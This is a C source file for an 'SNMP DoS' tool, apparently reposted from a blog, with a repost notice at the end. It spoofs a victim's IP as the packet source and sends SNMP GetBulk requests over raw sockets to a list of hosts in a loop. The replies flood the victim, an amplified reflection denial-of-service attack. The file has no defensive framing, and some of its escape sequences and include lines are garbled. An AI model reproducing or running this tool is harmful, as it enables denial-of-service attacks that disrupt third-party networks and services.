/* SNMP DDoS */ #include#include #include #include #include #include #include #include #include #include #include #include #include #include #include struct sockaddr_in dest; int sok,i=0, count=0, loop=0, lcount=0; char *source, *filename; char c; FILE *hostfile; char buf[32]; u_long address[2048]; int num = 0, n; char snmpkill[] = "/x30/x24/x02/x01/x01/x04/x06/x70/x75/x62/x6c/x69/x63/xa5/x17/x02" "/x04/x7b/x73/xcc/x13/x02/x01/x00/x02/x01/x64/x30/x09/x30/x07/x06" "/x03/x2b/x06/x01/x05"; in_cksum (unsigned short *ptr, int nbytes) { register long sum; /* assumes long == 32 bits */ u_short oddbyte; register u_short answer; /* assumes u_short == 16 bits */ /* * Our algorithm is simple, using a 32-bit accumulator (sum), * we add sequential 16-bit words to it, and at the end, fold back * all the carry bits from the top 16 bits into the lower 16 bits. */ sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } /* mop up an odd byte, if necessary */ if (nbytes == 1) { oddbyte = 0; /* make sure top half is zero */ *((u_char *) & oddbyte) = *(u_char *) ptr; /* one byte only */ sum += oddbyte; } /* * Add back carry outs from top 16 bits to low 16 bits. */ sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* ones-complement, then truncate to 16 bits */ return (answer); } void usage (void) { printf("SNMP DoS v1.0/n"); printf("Usage: snmpdos [-t target ip_addr] [-f host file] [-l loop count] /n"); } void loadfile (void) { if ((hostfile = fopen(filename, "r")) == NULL) { perror("Opening hostfile"); exit(-1); } while (fgets(buf, sizeof buf, hostfile) != NULL) { char *p; int valid; /* skip over comments/blank lines */ if (buf[0] == '#' || buf[0] == '/n') continue; /* get rid of newline */ buf[strlen(buf) - 1] = '/0'; /* check for valid address */ for (p = buf, valid = 1; *p != '/0'; p++) { if ( ! isdigit(*p) && *p != '.' ) { fprintf(stderr, "Skipping invalid ip %s/n", buf); valid = 0; break; } } /* if valid address, copy to our array */ if (valid) { address[num] = inet_addr(buf); num++; if (num == 2048) break; } } } int sendit(ulong destaddr) { struct pseudoudp { u_long ipsource; u_long ipdest; char zero; char proto; u_short length; } *psudp; struct in_addr sourceip_addr; struct in_addr destip_addr; struct ip *IP; struct udphdr *UDP; char *packet, *packetck, *data; int datasize; destip_addr.s_addr=destaddr; sourceip_addr.s_addr=inet_addr(source); dest.sin_addr.s_addr=destip_addr.s_addr; datasize=sizeof(snmpkill); packet = ( char * )malloc( 20 + 8 + datasize ); IP = (struct ip *)packet; memset(packet,0,sizeof(packet)); IP->ip_dst.s_addr = destip_addr.s_addr; IP->ip_src.s_addr = sourceip_addr.s_addr; IP->ip_v = 4; IP->ip_hl = 5; IP->ip_ttl = 245; IP->ip_id = htons(1047); IP->ip_p = 17; IP->ip_len = htons(20 + 8 + datasize); IP->ip_sum = in_cksum((u_short *)packet,20); UDP = (struct udphdr *)(packet+20); UDP->source = htons(161); UDP->dest = htons(161); UDP->len = htons(8+datasize); UDP->check = 0; packetck = (char *)malloc(8 + datasize + sizeof(struct pseudoudp)); bzero(packetck,8 + datasize + sizeof(struct pseudoudp)); psudp = (struct pseudoudp *) (packetck); psudp->ipdest = destip_addr.s_addr; psudp->ipsource = sourceip_addr.s_addr; psudp->zero = 0; psudp->proto = 17; psudp->length = htons(8+datasize); memcpy(packetck+sizeof(struct pseudoudp),UDP,8+datasize); memcpy(packetck+sizeof(struct pseudoudp)+8,snmpkill,datasize); UDP->check = in_cksum((u_short *)packetck,8+datasize+sizeof(struct pseudoudp)); data = (unsigned char *)(packet+20+8); memcpy(data,snmpkill,datasize); return(sendto(sok,packet,20+8+datasize,0,(struct sockaddr *) &dest,sizeof(struct sockaddr))); free(packet); free(packetck); } int main(int argc,char **argv){ if(argc < 3) { usage(); return 0; } while((c=getopt(argc,argv,"t:f:l:"))!=EOF){ switch(c) { case 't': source=optarg; break; case 'f': filename=optarg; break; case 'l': loop=atoi(optarg); break; default: usage(); } } loadfile(); dest.sin_family=AF_INET; if ( (sok=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0) { printf("Can't create socket./n"); exit(EXIT_FAILURE); } n=0; while(lcount < loop){ while(n < num) { if(sendit(address[n]) == -1) printf ("SENDING ERROR!/n"); n++; count++; } if(n == num){ n = 0; lcount++;} } printf("%i packets sent/n", count); return 0; }
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/57312.html